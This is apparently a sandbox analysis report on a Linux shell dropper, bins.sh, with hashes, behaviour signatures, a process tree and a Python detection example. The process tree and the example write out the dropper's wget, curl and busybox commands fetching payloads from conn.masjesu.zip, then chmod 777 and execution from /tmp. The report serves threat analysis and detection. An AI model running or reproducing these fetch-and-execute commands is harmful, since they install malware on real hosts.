Analysis
max time kernel: 72s
max time network: 104s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 28-10-2024 09:13
Static task: static1
Behavioral task behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample bins.sh, resource debian9-mipsel-20240226-en
General
Target: bins.sh
Size: 10KB
MD5: b385712a9f0ed1dbec9bfc8275bb2da9
SHA1: dedbedbd8e99674ee12610605d357a8375915d7d
SHA256: 7a1469a1ef092c727698affaffb0f788d398db1e393a4453f28aa140a8c943e7
SHA512: 1edd1419ac72eaf9befc0c174972fc05992bee64cc63851c526a43fa229181e080f0255f6fc9594a41b0fe23521fa4ed19eff11b2bb485679870f1155929227e
SSDEEP: 192:iZ//MNtZQV/VxcbrorvqKGXT0MbGadXLPoBp5//MNtZ0VxcbrSrveX90MbGadLPF:iZ//MNtZQV/VxcbrorvqKgT0MbGadXLX
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 2 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes: chmod (PID 728), chmod (PID 737)

Executes dropped EXE (2 IoCs)
Processes: /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 (PID 729), /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ (PID 738)

Reads runtime system information (3 IoCs)
Processes: three separate curl processes each opened /proc/sys/crypto/fips_enabled for reading

System Network Configuration Discovery (1 TTP, 8 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes: wget (PID 705), curl (PID 713), busybox (PID 726), wget (PID 733), curl (PID 734), busybox (PID 736), wget (PID 741), curl (PID 742)
Note: every process under this signature is one of the wget/curl/busybox payload fetches listed in the process tree; the report shows no separate network-configuration enumeration, so treat this as the outbound download activity rather than as a distinct discovery step.

Writes file to tmp directory (8 IoCs)
Malware often drops required files in the /tmp directory.
Processes:
- /tmp/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX opened for modification by wget, curl
- /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3 opened for modification by wget, curl, busybox
- /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ opened for modification by wget, curl, busybox
Processes
The tree below shows the classic bins.sh dropper loop: the script deletes itself, then for each payload name tries wget, curl and busybox wget in turn against the same URL on conn.masjesu.zip, marks the downloaded file 0777, executes it from /tmp and removes it before moving to the next name. The third payload (yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX) shows only the wget and curl fetches within the recorded run.

PID 696  /tmp/bins.sh  /tmp/bins.sh
  PID 703  /bin/rm  rm bins.sh
  PID 705  /usr/bin/wget  wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 713  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 726  /bin/busybox  busybox wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 728  /bin/chmod  chmod 777 b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
    - File and Directory Permissions Modification
  PID 729  /tmp/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3  ./b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
    - Executes dropped EXE
  PID 732  /bin/rm  rm b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3
  PID 733  /usr/bin/wget  wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 734  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 736  /bin/busybox  busybox wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 737  /bin/chmod  chmod 777 ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
    - File and Directory Permissions Modification
  PID 738  /tmp/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ  ./ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
    - Executes dropped EXE
  PID 740  /bin/rm  rm ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ
  PID 741  /usr/bin/wget  wget http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX
    - System Network Configuration Discovery
    - Writes file to tmp directory
  PID 742  /usr/bin/curl  curl -O http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
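To turn the process tree above into something a detection engineer can act on, here is an added Python example (it is not part of the report or of the sandbox's tooling) that reconstructs the download, chmod, execute, delete sequence per payload name from a flat process list and derives the IoCs: the hosting domain, the dropped paths, and whether each chain reached execution. The command lines are transcribed from the tree above; the (pid, command) tuple layout and the /tmp working directory are assumptions of the example, with /tmp taken from the report's "Writes file to tmp directory" IoCs.

```python
import re
from collections import OrderedDict
from urllib.parse import urlparse

# Constructed sample: (pid, command line) pairs transcribed from this report's
# process tree. The tuple layout is this example's assumption, not a sandbox
# export format.
PROCESS_LIST = [
    (696, "/tmp/bins.sh"),
    (703, "/bin/rm bins.sh"),
    (705, "wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3"),
    (713, "curl -O http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3"),
    (726, "/bin/busybox wget http://conn.masjesu.zip/bins/b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3"),
    (728, "chmod 777 b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3"),
    (729, "./b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3"),
    (732, "rm b0z8mLhrFDQUev7oJgrOzasRp2pmYpZAF3"),
    (733, "wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ"),
    (734, "curl -O http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ"),
    (736, "/bin/busybox wget http://conn.masjesu.zip/bins/ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ"),
    (737, "chmod 777 ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ"),
    (738, "./ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ"),
    (740, "rm ZMaFoHVZeblnP6gz2Pb70FgBkc0VcEZLcZ"),
    (741, "wget http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX"),
    (742, "curl -O http://conn.masjesu.zip/bins/yX3YdCFs1A4KoS8fbRvfuv8KU0qAZW1MFX"),
]

URL_RE = re.compile(r"https?://[^\s'\"]+")


def classify(cmd):
    """Map a command line to (stage, payload) or None; payload is the URL for downloads."""
    tokens = cmd.split()
    if not tokens:
        return None
    if tokens[0].startswith("./"):               # "./name": execution from the cwd
        return ("exec", tokens[0][2:])
    prog = tokens[0].rsplit("/", 1)[-1]
    if prog == "busybox" and len(tokens) > 1:    # "busybox wget ...": use the applet name
        tokens = tokens[1:]
        prog = tokens[0]
    if prog in ("wget", "curl"):
        match = URL_RE.search(cmd)
        if match:
            return ("download", match.group(0))
    if prog == "chmod" and len(tokens) >= 3:
        return ("chmod", tokens[-1])
    if prog == "rm" and len(tokens) >= 2:
        return ("rm", tokens[-1])
    return None


def dropper_chains(process_list):
    """Group chain steps per payload name in PID order, keeping URLs and chmod modes."""
    chains = OrderedDict()
    for pid, cmd in process_list:
        hit = classify(cmd)
        if hit is None:
            continue
        stage, payload = hit
        url = None
        if stage == "download":                  # retries by other fetchers stay separate stages
            url = payload
            payload = urlparse(url).path.rsplit("/", 1)[-1]
        chain = chains.setdefault(payload, {"urls": [], "stages": [], "modes": []})
        chain["stages"].append((stage, pid))
        if url and url not in chain["urls"]:
            chain["urls"].append(url)
        if stage == "chmod":
            chain["modes"].append(cmd.split()[-2])
    return chains


def stage_names(chain):
    return [stage for stage, _ in chain["stages"]]


def is_complete(chain):
    """True when the payload was fetched, made executable and actually run."""
    return {"download", "chmod", "exec"} <= set(stage_names(chain))


def world_writable_exec(chain):
    """True if any chmod mode grants write and execute to everyone (e.g. 777)."""
    return any(int(m, 8) & 0o002 and int(m, 8) & 0o111 for m in chain["modes"])


def hosts(chains):
    return {urlparse(u).hostname for c in chains.values() for u in c["urls"]}


def dropped_paths(chains, workdir="/tmp"):
    """Where fetched files land; workdir mirrors the report's /tmp IoCs (assumption)."""
    return [f"{workdir}/{name}" for name, c in chains.items() if c["urls"]]


if __name__ == "__main__":
    chains = dropper_chains(PROCESS_LIST)
    for name, chain in chains.items():
        print(name, stage_names(chain), "complete" if is_complete(chain) else "partial")
    print("hosts:", sorted(hosts(chains)), "dropped:", dropped_paths(chains))
```

The same grouping works on live EDR or auditd execve records once they are reduced to (pid, command line) tuples; the useful alert condition is a chain that reaches is_complete(), since a fetch alone also matches ordinary package scripts, while a world-writable chmod followed by execution from /tmp is rarely legitimate.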
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 101KB
  MD5: 8d0f8d45165dc1f3ba334ce75be39621
  SHA1: 1d5baece9d5af3885276735c3c20d28e161e00ff
  SHA256: 17441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
  SHA512: a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
- Filesize: 100KB
  MD5: 3b78bb645b81d600c30713d416f666be
  SHA1: 23796112f2cce2afb2217498b5ecf2801ab550f2
  SHA256: d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
  SHA512: 9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
- Filesize: 88KB
  MD5: e9e5d79acad49bbe6c77df0385ec77aa
  SHA1: 53bbc8b58873cf3117743fab15bd5508421370eb
  SHA256: a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
  SHA512: 828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381
- Filesize: 12KB
  MD5: 8bd9ed049a0d02b29a05249c4f5a48ef
  SHA1: 89ba06fada2c17657baac44c972ed118bedd4590
  SHA256: f1998857b0ee9a2b0e863da21667097f6e2021f5574d0146a7b376b4d7a10b1c
  SHA512: d9524b443d1e068c380bf5c14aac78a2dfd6b46763cd001275d048c2c276d51aff4ee9b98de91745b2efc7b4306adf8e82cede6409aff21bcb6881cc493a079c